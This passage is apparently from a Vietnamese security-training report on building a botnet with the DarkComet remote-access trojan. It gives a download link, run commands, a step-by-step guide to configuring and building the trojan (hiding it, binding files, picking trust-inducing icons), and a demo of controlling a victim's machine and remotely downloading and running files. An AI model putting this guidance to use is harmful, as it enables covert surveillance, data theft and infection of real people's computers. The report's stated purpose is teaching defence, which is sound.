  • 19. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 18 PHẦN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET 1. Giới thiệu DarkComet DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất nổi tiếng, Tuy nhiên mình thấy Dark Comet là một soft đơn giản cực kì lợi hại và nguy hiểm, với các tính năng như: + Remote Desktop Như TeamViewer nhưng không cần sự đồng ý. + Xem các thư mục của máy victim, ăn cắp tài liệu từ máy victim. + Có thể tạo, đọc và xóa các thư mục trong máy victim. + Xem lén Webcam của victim. + Nghe trộm qua microphone của victim. + Mở website bất kì mà không cần sự đồng ý của victim. + Chat với victim (cái này fê phết, victim còn đíu tắt được cơ) + Keylog có thể xem luôn hoặc về email. + Xem regedit + Có thể sử dung chức năng ctrl + alt + del, Task Manager + Download file và chạy bình thường hoặc là ẩn ( Send sang máy victim thêm vài con trojan nữa chẳng hạn) + Khởi động cùng win con trojan đó… Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT v5.4.1 Legacy vào ngày 1/10/2012. 2. Cài đặt DarkComet Bản darkcomet dùng trong báo cáo được tải từ: http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar. Chạy DarkComet trên linux: Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT dùng lệnh: unzip darkcomet5.3.1RAT. Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet
  • 20. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 19 Giao diện quản lí các bot của DarkComet, chờ đợi các kết nối tới: Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to new port(+Listen) Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận Giao diện thêm socket lắng nghe Ta có thể thêm cổng lắng nghe khác nếu muốn.
  • 21. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 20 Tạo trojan: Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan: - Download DarkComet v 531 - Sau đó giải nén file DarkComet531RAT.zip - Vào thư mục giải nén, chạy file DarkComet.exe - Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c ủa tro jan theo m ặc đ ịnh (DarkComet -> Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -> Server module-> Full Editor) Giao diện tùy chọn:
  • 22. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 21 Các cài đặt: + Main settings - Password - server ID, - profile name - tùy chọn bypass tường lửa + Network Settings - Cài đặt IP sẽ lắng nghe các bot và cổng lắng nghe của server.
  • 23. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 22
  • 24. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 23 + Module Startup Tùy chọn bot có khởi động cùng Windows hay không.
  • 25. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 24 + Install Message Hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy chương trình bot hay không
  • 26. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 25 + Module Shield: Các tùy chọn giúp bot ẩn
  • 27. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 26 + Keylogger Tùy chọn ghi log bàn phím, địa chỉ tải log.
  • 28. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 27 + File Binder Tùy chọn đính kèm file khác.
  • 29. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 28 + Choose Icon Tùy chọn một icon để tạo sự tin tưởng cho nạn nhân.
  • 30. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 29 + Stub Finalization Tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn cách nén file trojan và lưu các cài đặt để sử dụng lại. Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo trojan.
  • 31. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 30 Giao diện quản lí users:
  • 32. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 31 Giao diện điều khiển user: Demo điều khiển máy nạn nhân Xem thông tin máy nạn nhân Trong giao diện điều khiển user, vào tab Comuter Information để xem thông tin máy nạn nhân. Nếu thông tin chưa hiển thị, nhấn Refresh để hiển thị.
  • 33. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 32 Quản lý file Trong giao diện điều khiển user, vào mục Files manager - > Explorer files Ta có giao diện quản lý files trong máy nạn nhân
  • 34. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 33 Cột bên trái là các thư mục trong máy chủ (server), cột bên phải là các thư mục trong máy nạn nhân. DarkComet có toàn quyền với máy nạn nhân nên ta có thể duyệt thư mục, thêm, sửa, xóa các thư mục hay file trong máy nạn nhân. Ví dụ duyệt thư mục C:
  • 35. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 34 Xem danh sách các port đang mở trên máy nạn nhân Trong giao diện quản lý user, vào Network Functions -> Active ports. Trên bảng điều khiển, ta thấy được các process nào đang dùng port nào, trạng thái port. Đồng thời ta còn có thể tắt những process đang chạy bằng cách nhấp chuột phải vào process muốn tắt và chọn Kill process ID. Điều khiển máy nạn nhân download và thực thi một file Từ giao diện điều khiển user, vào Network Funtions -> Url download.
  • 36. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 35 Chọn nơi lưu trữ file tại ô Destination Path Chọn đường dẫn download tại ô Download from. Tùy chọn file có thực thi ngay sau khi download thành công bằng cách tick vào ô Execute the file after download. Sau khi thiết lập xong các tùy chọn, nhấn Add để thêm vào danh sách đợi lệnh, nhấn Launch Process để thực thi lệnh. Ví dụ: download và mở một file html tại http://webdesignerbk10.tk/index.html, lưu file tại Desktop. Kết quả: trên Desktop máy nạn nhân có file index.html và trình duyệt mặc định của máy nạn nhân mở file này lên. HƯỚNG PHÁT TRIỂN Công nghệ thông tin là ngành đang phát triển rất mạnh ở Việt Nam. Theo số liệu từ “Sách trắng Công nghệ thông tin – Truyền thông 2013”, cả nước có trên 1300 trang thông tin điện tử, 420 trang mạng xã hội được cấp phép. Đi cùng với sự phát triển này là số lượng các máy chủ (server) phục vụ các trang mạng, máy tính để bàn (PC), máy tính xách tay (laptop) cũng tăng lên rất nhanh. Nếu không có các biện pháp bảo mật nghiêm ngặt thì đây là môi trường rất thuận lợi cho sự phát triển của botnet, zombie.
  • 37. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 36 Để tiếp tục phát triển và đáp ứng yêu cầu thực tế, đề tài này cần nghiêng cứu mở rộng theo các hướng: Các phương pháp bypass các antivirus hiện tại Các loại bot phổ biến và nguy hiểm khác Các cách phát tán botnet Các cách khai thác botnet Các phương pháp hiệu quả để phòng chống trở thành zombie, botnet KẾT LUẬN Từ khi ra đời đến nay, mạng internet luôn tiềm ẩn nguy các nguy cơ bảo mật. Tìm hiểu về mạng lưới zombie, botnet rất có ích cho người dùng phổ thông, giúp hạn chế nguy cơ bị biến thành botnet. Đề tài này càng có ít cho người quản trị hệ thống, giúp hiểu rõ cơ chế hoạt động của mạng lưới zombie, botnet, từ đó đề ra các biện pháp phòng ngừa thích hợp.
  • 38. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 37 TÀI LIỆU THAM KHẢO 3. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ HỔNG MẠNG TẠI TRUNG TÂM ATHENA” 4. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng – Bí quyết và giải pháp” 5. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php 6. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a- capital-v